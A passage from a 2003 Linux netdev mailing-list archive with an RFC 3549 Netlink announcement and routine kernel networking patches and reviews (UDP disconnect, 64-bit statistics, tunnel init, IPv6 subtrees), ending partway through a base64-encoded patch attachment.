-0400 (EDT) Received: from sandelman.ottawa.on.ca (marajade.sandelman.ottawa.on.ca [192.139.46.20]) by lox.sandelman.ottawa.on.ca (8.11.6/8.11.6) with ESMTP id h63Ga5Y03011 for ; Thu, 3 Jul 2003 12:36:05 -0400 (EDT) Received: from marajade.sandelman.ottawa.on.ca (mcr@localhost) by sandelman.ottawa.on.ca (8.12.3/8.12.3/Debian -4) with ESMTP id h63GYIHc012786 for ; Thu, 3 Jul 2003 12:34:21 -0400 To: netdev Subject: rfc-editor@rfc-editor.org: RFC 3549 on Linux Netlink as an IP Services Protocol Mime-Version: 1.0 (generated by tm-edit 1.8) Content-Type: text/plain; charset=US-ASCII Date: Thu, 03 Jul 2003 12:34:18 -0400 Message-ID: <12785.1057250058@marajade.sandelman.ottawa.on.ca> From: Michael Richardson X-archive-position: 3745 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mcr@sandelman.ottawa.on.ca Precedence: bulk X-list: netdev From owner-ietf-announce@ietf.org Wed Jul 2 21:00:43 2003 Return-Path: Message-Id: <200307022318.h62NI9L04528@gamma.isi.edu> To: IETF-Announce: ; Subject: RFC 3549 on Linux Netlink as an IP Services Protocol Cc: rfc-editor@rfc-editor.org, forces@peach.ease.lsoft.com From: rfc-editor@rfc-editor.org Mime-Version: 1.0 Content-Type: Multipart/Mixed; Boundary=NextPart Date: Wed, 02 Jul 2003 16:18:09 -0700 Sender: owner-ietf-announce@ietf.org Precedence: bulk --NextPart A new Request for Comments is now available in online RFC libraries. RFC 3549 Title: Linux Netlink as an IP Services Protocol Author(s): J. Salim, H. Khosravi, A. Kleen, A. Kuznetsov Status: Informational Date: July 2003 Mailbox: hadi@znyx.com, hormuzd.m.khosravi@intel.com, ak@suse.de, kuznet@ms2.inr.ac.ru Pages: 33 Characters: 72161 Updates/Obsoletes/SeeAlso: None I-D Tag: draft-ietf-forces-netlink-04.txt URL: ftp://ftp.rfc-editor.org/in-notes/rfc3549.txt This document describes Linux Netlink, which is used in Linux both as an intra-kernel messaging system as well as between kernel and user space. The focus of this document is to describe Netlink's functionality as a protocol between a Forwarding Engine Component (FEC) and a Control Plane Component (CPC), the two components that define an IP service. As a result of this focus, this document ignores other uses of Netlink, including its use as a intra-kernel messaging system, as an inter-process communication scheme (IPC), or as a configuration tool for other non-networking or non-IP network services (such as decnet, etc.). This document is intended as informational in the context of prior art for the ForCES IETF working group. This document is a product of the Forwarding and Control Element Separation Working Group of the IETF. This memo provides information for the Internet community. It does not specify an Internet standard of any kind. Distribution of this memo is unlimited. This announcement is sent to the IETF list and the RFC-DIST list. Requests to be added to or deleted from the IETF distribution list should be sent to IETF-REQUEST@IETF.ORG. Requests to be added to or deleted from the RFC-DIST distribution list should be sent to RFC-DIST-REQUEST@RFC-EDITOR.ORG. Details on obtaining RFCs via FTP or EMAIL may be obtained by sending an EMAIL message to rfc-info@RFC-EDITOR.ORG with the message body help: ways_to_get_rfcs. For example: To: rfc-info@RFC-EDITOR.ORG Subject: getting rfcs help: ways_to_get_rfcs Requests for special distribution should be addressed to either the author of the RFC in question, or to RFC-Manager@RFC-EDITOR.ORG. Unless specifically noted otherwise on the RFC itself, all RFCs are for unlimited distribution.echo Submissions for Requests for Comments should be sent to RFC-EDITOR@RFC-EDITOR.ORG. Please consult RFC 2223, Instructions to RFC Authors, for further information. Joyce K. Reynolds and Sandy Ginoza USC/Information Sciences Institute ... Below is the data which will enable a MIME compliant Mail Reader implementation to automatically retrieve the ASCII version of the RFCs. --NextPart Content-Type: Multipart/Alternative; Boundary="OtherAccess" --OtherAccess Content-Type: Message/External-body; access-type="mail-server"; server="RFC-INFO@RFC-EDITOR.ORG" Content-Type: text/plain Content-ID: <030702161638.RFC@RFC-EDITOR.ORG> RETRIEVE: rfc DOC-ID: rfc3549 --OtherAccess Content-Type: Message/External-body; name="rfc3549.txt"; site="ftp.isi.edu"; access-type="anon-ftp"; directory="in-notes" Content-Type: text/plain Content-ID: <030702161638.RFC@RFC-EDITOR.ORG> --OtherAccess-- --NextPart-- From yoshfuji@linux-ipv6.org Thu Jul 3 10:27:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 03 Jul 2003 10:27:57 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h63HRh2x007697 for ; Thu, 3 Jul 2003 10:27:45 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h63HSxBo012759; Fri, 4 Jul 2003 02:28:59 +0900 Date: Fri, 04 Jul 2003 02:28:57 +0900 (JST) Message-Id: <20030704.022857.07343571.yoshfuji@linux-ipv6.org> To: shibu_lkml@yahoo.com, davem@redhat.com, jmorris@intercode.com.au Cc: netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: [PATCH] NET: disconnect support by null address (is Re: Disconnecting a connected UDP socket) From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030703031610.79050.qmail@web20704.mail.yahoo.com> References: <20030703031610.79050.qmail@web20704.mail.yahoo.com> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3746 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev Hello. In article <20030703031610.79050.qmail@web20704.mail.yahoo.com> (at Wed, 2 Jul 2003 20:16:10 -0700 (PDT)), Shibu LKML says: > I am wondering if Linux supports disconnecting a connected UDP socket. The manpage for connect lists it in the BUGS section. It says disconnect is still not supported. I was wondering if it involves more than adding the following lines to udp_connect in udp.c > > if (usin->sin_family == AF_UNSPEC) > return udp_disconnect(sk, 0); > > (just above sk_dst_reset(sk)) > > Will this fix the problem for IPV4 stuff? It seems. Please apply this. Index: linux-2.5/net/ipv4/udp.c =================================================================== RCS file: /home/cvs/linux-2.5/net/ipv4/udp.c,v retrieving revision 1.36 diff -u -r1.36 udp.c --- linux-2.5/net/ipv4/udp.c 21 Jun 2003 16:20:28 -0000 1.36 +++ linux-2.5/net/ipv4/udp.c 3 Jul 2003 16:01:29 -0000 @@ -868,6 +868,9 @@ if (addr_len < sizeof(*usin)) return -EINVAL; + if (usin->sin_family == AF_UNSPEC) + return udp_disconnect(sk, 0); + if (usin->sin_family != AF_INET) return -EAFNOSUPPORT; Index: linux-2.5/net/ipv6/udp.c =================================================================== RCS file: /home/cvs/linux-2.5/net/ipv6/udp.c,v retrieving revision 1.39 diff -u -r1.39 udp.c --- linux-2.5/net/ipv6/udp.c 1 Jul 2003 16:42:06 -0000 1.39 +++ linux-2.5/net/ipv6/udp.c 3 Jul 2003 16:01:29 -0000 @@ -213,6 +213,9 @@ int addr_type; int err; + if (usin->sin6_family == AF_UNSPEC) + return udp_disconnect(sk, 0); + if (usin->sin6_family == AF_INET) { if (__ipv6_only_sock(sk)) return -EAFNOSUPPORT; -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From yoshfuji@linux-ipv6.org Thu Jul 3 10:47:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 03 Jul 2003 10:47:38 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h63HlV2x009392 for ; Thu, 3 Jul 2003 10:47:32 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h63HmoBo012935; Fri, 4 Jul 2003 02:48:50 +0900 Date: Fri, 04 Jul 2003 02:48:50 +0900 (JST) Message-Id: <20030704.024850.88858438.yoshfuji@linux-ipv6.org> To: shibu_lkml@yahoo.com, davem@redhat.com, jmorris@intercode.com.au Cc: netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: [PATCH] NET: disconnect support by null address (is Re: Disconnecting a connected UDP socket) From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030704.022857.07343571.yoshfuji@linux-ipv6.org> References: <20030703031610.79050.qmail@web20704.mail.yahoo.com> <20030704.022857.07343571.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit X-archive-position: 3747 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030704.022857.07343571.yoshfuji@linux-ipv6.org> (at Fri, 04 Jul 2003 02:28:57 +0900 (JST)), YOSHIFUJI Hideaki / $B5HF#1QL@(B says: > It seems. Please apply this. Sorry, I was too hurry. net/ipv4/af_inet.c:inet_dgram_connect() cares this case. Please forget the patch... -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From greearb@candelatech.com Thu Jul 3 11:01:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 03 Jul 2003 11:01:21 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h63I1B2x009802 for ; Thu, 3 Jul 2003 11:01:12 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h63I0sKk024810; Thu, 3 Jul 2003 11:00:55 -0700 Message-ID: <3F046F56.1080808@candelatech.com> Date: Thu, 03 Jul 2003 11:00:54 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Michael Richardson , hadi@znyx.com, hormuzd.m.khosravi@intel.com, ak@suse.de, kuznet@ms2.inr.ac.ru, "'netdev@oss.sgi.com'" Subject: Re: rfc-editor@rfc-editor.org: RFC 3549 on Linux Netlink as an IP Services Protocol References: <12785.1057250058@marajade.sandelman.ottawa.on.ca> In-Reply-To: <12785.1057250058@marajade.sandelman.ottawa.on.ca> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3748 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Please make the 'table-id' field to be at least 16 bits. Now that we have VLANs and other types of virtual interfaces, it would be nice to be able to have a routing table for each interface, for example. 640k was not enough for everyone, and ~250 routing tables isn't either :) From section 3.1.1: Table ID: 8 bits Table identifier. Up to 255 route tables are supported. RT_TABLE_UNSPEC An unspecified routing table. RT_TABLE_DEFAULT The default table. RT_TABLE_MAIN The main table. RT_TABLE_LOCAL The local table. The user may assign arbitrary values between RT_TABLE_UNSPEC(0) and RT_TABLE_DEFAULT(253). Thanks, Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From jgarzik@pobox.com Thu Jul 3 19:47:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 03 Jul 2003 19:47:17 -0700 (PDT) Received: from www.linux.org.uk (parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h642lA2x018741 for ; Thu, 3 Jul 2003 19:47:11 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19YGbL-0006Gs-Lu; Fri, 04 Jul 2003 03:47:07 +0100 Message-ID: <3F04EAA0.2050102@pobox.com> Date: Thu, 03 Jul 2003 22:46:56 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Jeff Sipek CC: Kernel Mailing List , Andrew Morton , Dave Jones , Linus Torvalds , netdev@oss.sgi.com Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net References: <200307032231.39842.jeffpc@optonline.net> In-Reply-To: <200307032231.39842.jeffpc@optonline.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3749 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Jeff Sipek wrote: > + spinlock_t rx_packets; > + spinlock_t tx_packets; > + spinlock_t rx_bytes; > + spinlock_t tx_bytes; > + spinlock_t rx_errors; > + spinlock_t tx_errors; > + spinlock_t rx_dropped; > + spinlock_t tx_dropped; > + spinlock_t multicast; > + spinlock_t collisions; > + spinlock_t rx_length_errors; > + spinlock_t rx_over_errors; > + spinlock_t rx_crc_errors; > + spinlock_t rx_frame_errors; > + spinlock_t rx_fifo_errors; > + spinlock_t rx_missed_errors; > + spinlock_t tx_aborted_errors; > + spinlock_t tx_carrier_errors; > + spinlock_t tx_fifo_errors; > + spinlock_t tx_heartbeat_errors; > + spinlock_t tx_window_errors; > + spinlock_t rx_compressed; > + spinlock_t tx_compressed; That's a fat daddy list of locks you got there. > + NETSTAT_TYPE _rx_packets; /* total packets received */ > + NETSTAT_TYPE _tx_packets; /* total packets transmitted */ > + NETSTAT_TYPE _rx_bytes; /* total bytes received */ > + NETSTAT_TYPE _tx_bytes; /* total bytes transmitted */ > + NETSTAT_TYPE _rx_errors; /* bad packets received */ > + NETSTAT_TYPE _tx_errors; /* packet transmit problems */ > + NETSTAT_TYPE _rx_dropped; /* no space in linux buffers */ > + NETSTAT_TYPE _tx_dropped; /* no space available in linux */ > + NETSTAT_TYPE _multicast; /* multicast packets received */ > + NETSTAT_TYPE _collisions; Increasing user-visible sizes arbitrarily breaks stuff. Having config-dependent types like this increases complexity. Short term, just sample the stats more rapidly. Long term, I suppose with 10GbE we should start thinking about this. Personally, I would prefer to make the standard net device stats available in the format already exported by ETHTOOL_GSTATS -- which I note uses u64's for its counters, and it's easily extensible. I received a request for this just today, even. Jeff P.S. Please cc netdev@oss.sgi.com for networking discussions. From vnuorval@tcs.hut.fi Fri Jul 4 17:16:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 04 Jul 2003 17:16:40 -0700 (PDT) Received: from mail.tcs.hut.fi (mail.tcs.hut.fi [130.233.215.20]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h650GO2x014726 for ; Fri, 4 Jul 2003 17:16:25 -0700 Received: from rhea.tcs.hut.fi (rhea.tcs.hut.fi [130.233.215.147]) by mail.tcs.hut.fi (Postfix) with ESMTP id 52C8C800217; Fri, 4 Jul 2003 16:00:31 +0300 (EEST) Received: from rhea.tcs.hut.fi (localhost [127.0.0.1]) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64D0V5L015331; Fri, 4 Jul 2003 16:00:31 +0300 Received: from localhost (vnuorval@localhost) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64D0T4J015327; Fri, 4 Jul 2003 16:00:30 +0300 Date: Fri, 4 Jul 2003 16:00:29 +0300 (EEST) From: Ville Nuorvala To: yoshfuji@linux-ipv6.org, , Cc: netdev@oss.sgi.com Subject: [PATCH] Tunnel device init patch Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3758 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: vnuorval@tcs.hut.fi Precedence: bulk X-list: netdev Hello, I noticed a couple of bugs(?) in sit.c, ip_gre.c and ipip.c introduced in the alloc_netdev patches (csets 1.305.3.9, 1.305.3.10 and 1.1305.3.11). This patch made against cset 1.384 fixes the following issues: - tunnel dev pointer also set for fallback tunnels - dev name copied back to tunnel parameters so names autogenerated by kernel get correctly reported to userspace Thanks, Ville diff -Nur linux-2.5.OLD/net/ipv4/ip_gre.c linux-2.5/net/ipv4/ip_gre.c --- linux-2.5.OLD/net/ipv4/ip_gre.c Fri Jul 4 15:01:54 2003 +++ linux-2.5/net/ipv4/ip_gre.c Fri Jul 4 14:59:27 2003 @@ -1153,7 +1153,9 @@ tunnel = (struct ip_tunnel*)dev->priv; iph = &tunnel->parms.iph; - tunnel->dev = dev; + tunnel->dev = dev; + strcpy(tunnel->parms.name, dev->name); + memcpy(dev->dev_addr, &tunnel->parms.iph.saddr, 4); memcpy(dev->broadcast, &tunnel->parms.iph.daddr, 4); @@ -1214,6 +1216,9 @@ { struct ip_tunnel *tunnel = (struct ip_tunnel*)dev->priv; struct iphdr *iph = &tunnel->parms.iph; + + tunnel->dev = dev; + strcpy(tunnel->parms.name, dev->name); iph->version = 4; iph->protocol = IPPROTO_GRE; diff -Nur linux-2.5.OLD/net/ipv4/ipip.c linux-2.5/net/ipv4/ipip.c --- linux-2.5.OLD/net/ipv4/ipip.c Fri Jul 4 15:01:54 2003 +++ linux-2.5/net/ipv4/ipip.c Fri Jul 4 14:59:27 2003 @@ -805,7 +805,10 @@ tunnel = (struct ip_tunnel*)dev->priv; iph = &tunnel->parms.iph; + tunnel->dev = dev; + strcpy(tunnel->parms.name, dev->name); + memcpy(dev->dev_addr, &tunnel->parms.iph.saddr, 4); memcpy(dev->broadcast, &tunnel->parms.iph.daddr, 4); @@ -840,6 +843,9 @@ { struct ip_tunnel *tunnel = dev->priv; struct iphdr *iph = &tunnel->parms.iph; + + tunnel->dev = dev; + strcpy(tunnel->parms.name, dev->name); iph->version = 4; iph->protocol = IPPROTO_IPIP; diff -Nur linux-2.5.OLD/net/ipv6/sit.c linux-2.5/net/ipv6/sit.c --- linux-2.5.OLD/net/ipv6/sit.c Fri Jul 4 15:01:55 2003 +++ linux-2.5/net/ipv6/sit.c Fri Jul 4 14:59:27 2003 @@ -743,7 +743,10 @@ tunnel = (struct ip_tunnel*)dev->priv; iph = &tunnel->parms.iph; + tunnel->dev = dev; + strcpy(tunnel->parms.name, dev->name); + memcpy(dev->dev_addr, &tunnel->parms.iph.saddr, 4); memcpy(dev->broadcast, &tunnel->parms.iph.daddr, 4); @@ -779,6 +782,9 @@ { struct ip_tunnel *tunnel = dev->priv; struct iphdr *iph = &tunnel->parms.iph; + + tunnel->dev = dev; + strcpy(tunnel->parms.name, dev->name); iph->version = 4; iph->protocol = IPPROTO_IPV6; -- Ville Nuorvala Research Assistant, Institute of Digital Communications, Helsinki University of Technology email: vnuorval@tcs.hut.fi, phone: +358 (0)9 451 5257 From vnuorval@tcs.hut.fi Fri Jul 4 17:16:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 04 Jul 2003 17:16:43 -0700 (PDT) Received: from mail.tcs.hut.fi (mail.tcs.hut.fi [130.233.215.20]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h650GM2x014724 for ; Fri, 4 Jul 2003 17:16:23 -0700 Received: from rhea.tcs.hut.fi (rhea.tcs.hut.fi [130.233.215.147]) by mail.tcs.hut.fi (Postfix) with ESMTP id 00867800225; Sat, 5 Jul 2003 01:11:24 +0300 (EEST) Received: from rhea.tcs.hut.fi (localhost [127.0.0.1]) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64MBN5L017133; Sat, 5 Jul 2003 01:11:23 +0300 Received: from localhost (vnuorval@localhost) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64MBN2L017129; Sat, 5 Jul 2003 01:11:23 +0300 Date: Sat, 5 Jul 2003 01:11:23 +0300 (EEST) From: Ville Nuorvala To: yoshfuji@linux-ipv6.org, Cc: netdev@oss.sgi.com, , , , Subject: [PATCH][1/3] IPV6: split CONFIG_IPV6_SUBTREES fix In-Reply-To: <20030531.000319.114704530.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="-377318441-274968981-1057356683=:17083" X-archive-position: 3759 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: vnuorval@tcs.hut.fi Precedence: bulk X-list: netdev This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. ---377318441-274968981-1057356683=:17083 Content-Type: TEXT/PLAIN; charset=US-ASCII Hello, now I've split and cleaned up the CONFIG_IPV6_SUBTREES patch I submitted earlier. The functionality should be equivalent with the previous version, but I'll still do some more bug tests on the code when I get back from my vacation on Monday :) The patches are done agains cset 1.1384 and are incremental. The first patch doesn't actually fix any bugs in the IPv6 code, but tweaks tcp_v6_connect() a bit and makes the actual subtrees fix for TCP a bit cleaner. Regards, Ville -- Ville Nuorvala Research Assistant, Institute of Digital Communications, Helsinki University of Technology email: vnuorval@tcs.hut.fi, phone: +358 (0)9 451 5257 ---377318441-274968981-1057356683=:17083 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="subtrees-1.patch" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename="subtrees-1.patch" ZGlmZiAtTnVyIC0tZXhjbHVkZT1SQ1MgLS1leGNsdWRlPUNWUyAtLWV4Y2x1 ZGU9U0NDUyAtLWV4Y2x1ZGU9Qml0S2VlcGVyIC0tZXhjbHVkZT1DaGFuZ2VT ZXQgbGludXgtMi41Lk9MRC9uZXQvaXB2Ni90Y3BfaXB2Ni5jIGxpbnV4LTIu NS9uZXQvaXB2Ni90Y3BfaXB2Ni5jDQotLS0gbGludXgtMi41Lk9MRC9uZXQv aXB2Ni90Y3BfaXB2Ni5jCVdlZCBKdWwgIDIgMTU6NDI6MDMgMjAwMw0KKysr IGxpbnV4LTIuNS9uZXQvaXB2Ni90Y3BfaXB2Ni5jCUZyaSBKdWwgIDQgMjM6 Mjg6MzIgMjAwMw0KQEAgLTU0NCw3ICs1NDQsNiBAQA0KIAlzdHJ1Y3QgaXB2 Nl9waW5mbyAqbnAgPSBpbmV0Nl9zayhzayk7DQogCXN0cnVjdCB0Y3Bfb3B0 ICp0cCA9IHRjcF9zayhzayk7DQogCXN0cnVjdCBpbjZfYWRkciAqc2FkZHIg PSBOVUxMOw0KLQlzdHJ1Y3QgaW42X2FkZHIgc2FkZHJfYnVmOw0KIAlzdHJ1 Y3QgZmxvd2kgZmw7DQogCXN0cnVjdCBkc3RfZW50cnkgKmRzdDsNCiAJaW50 IGFkZHJfdHlwZTsNCkBAIC02NzEsMjMgKzY3MCwyNCBAQA0KIAkJZ290byBm YWlsdXJlOw0KIAl9DQogDQotCWlwNl9kc3Rfc3RvcmUoc2ssIGRzdCwgTlVM TCk7DQotCXNrLT5za19yb3V0ZV9jYXBzID0gZHN0LT5kZXYtPmZlYXR1cmVz ICYNCi0JCQkgICAgfihORVRJRl9GX0lQX0NTVU0gfCBORVRJRl9GX1RTTyk7 DQotDQogCWlmIChzYWRkciA9PSBOVUxMKSB7DQotCQllcnIgPSBpcHY2X2dl dF9zYWRkcihkc3QsICZucC0+ZGFkZHIsICZzYWRkcl9idWYpOw0KLQkJaWYg KGVycikNCisJCWVyciA9IGlwdjZfZ2V0X3NhZGRyKGRzdCwgJm5wLT5kYWRk ciwgJmZsLmZsNl9zcmMpOw0KKwkJaWYgKGVycikgew0KKwkJCWRzdF9yZWxl YXNlKGRzdCk7DQogCQkJZ290byBmYWlsdXJlOw0KLQ0KLQkJc2FkZHIgPSAm c2FkZHJfYnVmOw0KKwkJfQ0KKwkJc2FkZHIgPSAmZmwuZmw2X3NyYzsNCisJ CWlwdjZfYWRkcl9jb3B5KCZucC0+cmN2X3NhZGRyLCBzYWRkcik7DQogCX0N CiANCiAJLyogc2V0IHRoZSBzb3VyY2UgYWRkcmVzcyAqLw0KLQlpcHY2X2Fk ZHJfY29weSgmbnAtPnJjdl9zYWRkciwgc2FkZHIpOw0KIAlpcHY2X2FkZHJf Y29weSgmbnAtPnNhZGRyLCBzYWRkcik7DQogCWluZXQtPnJjdl9zYWRkciA9 IExPT1BCQUNLNF9JUFY2Ow0KIA0KKwlpcDZfZHN0X3N0b3JlKHNrLCBkc3Qs IE5VTEwpOw0KKwlzay0+c2tfcm91dGVfY2FwcyA9IGRzdC0+ZGV2LT5mZWF0 dXJlcyAmDQorCQkJICAgIH4oTkVUSUZfRl9JUF9DU1VNIHwgTkVUSUZfRl9U U08pOw0KKw0KIAl0cC0+ZXh0X2hlYWRlcl9sZW4gPSAwOw0KIAlpZiAobnAt Pm9wdCkNCiAJCXRwLT5leHRfaGVhZGVyX2xlbiA9IG5wLT5vcHQtPm9wdF9m bGVuICsgbnAtPm9wdC0+b3B0X25mbGVuOw0KQEAgLTcxNCw4ICs3MTQsOCBA QA0KIA0KIGxhdGVfZmFpbHVyZToNCiAJdGNwX3NldF9zdGF0ZShzaywgVENQ X0NMT1NFKTsNCi1mYWlsdXJlOg0KIAlfX3NrX2RzdF9yZXNldChzayk7DQor ZmFpbHVyZToNCiAJaW5ldC0+ZHBvcnQgPSAwOw0KIAlzay0+c2tfcm91dGVf Y2FwcyA9IDA7DQogCXJldHVybiBlcnI7DQo= ---377318441-274968981-1057356683=:17083-- From vnuorval@tcs.hut.fi Fri Jul 4 17:33:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 04 Jul 2003 17:33:24 -0700 (PDT) Received: from mail.tcs.hut.fi (mail.tcs.hut.fi [130.233.215.20]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h650X32x015088 for ; Fri, 4 Jul 2003 17:33:03 -0700 Received: from rhea.tcs.hut.fi (rhea.tcs.hut.fi [130.233.215.147]) by mail.tcs.hut.fi (Postfix) with ESMTP id CC7E1800226; Sat, 5 Jul 2003 01:25:20 +0300 (EEST) Received: from rhea.tcs.hut.fi (localhost [127.0.0.1]) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64MPK5L017160; Sat, 5 Jul 2003 01:25:20 +0300 Received: from localhost (vnuorval@localhost) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64MPHnw017156; Sat, 5 Jul 2003 01:25:17 +0300 Date: Sat, 5 Jul 2003 01:25:17 +0300 (EEST) From: Ville Nuorvala To: yoshfuji@linux-ipv6.org, Cc: netdev@oss.sgi.com, , , , Subject: [PATCH][2/3] IPV6: split CONFIG_IPV6_SUBTREES fix In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="-377318441-1491903089-1057357517=:17083" X-archive-position: 3761 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: vnuorval@tcs.hut.fi Precedence: bulk X-list: netdev This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. ---377318441-1491903089-1057357517=:17083 Content-Type: TEXT/PLAIN; charset=US-ASCII Hi, the second patch fixes the bugs with CONFIG_IPV6_SUBTREES so it doesn't crash the kernel anymore. The route lookups in the IPv6 code have also been changed to better take the source address into account. Regards, Ville -- Ville Nuorvala Research Assistant, Institute of Digital Communications, Helsinki University of Technology email: vnuorval@tcs.hut.fi, phone: +358 (0)9 451 5257 ---377318441-1491903089-1057357517=:17083 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="subtrees-2.patch" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename="subtrees-2.patch" ZGlmZiAtTnVyIC0tZXhjbHVkZT1SQ1MgLS1leGNsdWRlPUNWUyAtLWV4Y2x1 ZGU9U0NDUyAtLWV4Y2x1ZGU9Qml0S2VlcGVyIC0tZXhjbHVkZT1DaGFuZ2VT ZXQgbGludXgtMi41Lk9MRC9pbmNsdWRlL2xpbnV4L2lwdjYuaCBsaW51eC0y 